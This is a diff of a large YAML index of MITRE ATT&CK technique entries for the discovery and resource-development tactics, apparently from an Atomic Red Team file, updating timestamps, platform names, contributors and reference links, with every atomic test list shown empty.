-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -52359,17 +53047,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -52377,10 +53064,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -52389,15 +53078,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -52425,9 +53115,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -52502,7 +53189,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -52574,7 +53260,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -52623,12 +53308,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -52649,12 +53333,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -52679,7 +53362,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -52734,7 +53416,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -52754,7 +53436,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -52857,13 +53538,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52874,7 +53554,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52945,29 +53625,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -52991,15 +53670,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -53031,17 +53713,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -53094,11 +53775,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -53134,7 +53814,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -53183,43 +53863,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -53232,18 +53881,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -53265,7 +53945,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -53281,8 +53961,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -53304,7 +53982,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -53324,8 +54002,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -53364,7 +54040,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -53385,8 +54061,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -53416,7 +54090,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -53453,8 +54127,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -53476,7 +54148,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -53498,8 +54170,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -53536,7 +54206,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -53558,8 +54228,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -53621,7 +54289,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -53643,7 +54310,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -53661,8 +54328,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -53697,7 +54362,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -53716,33 +54381,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
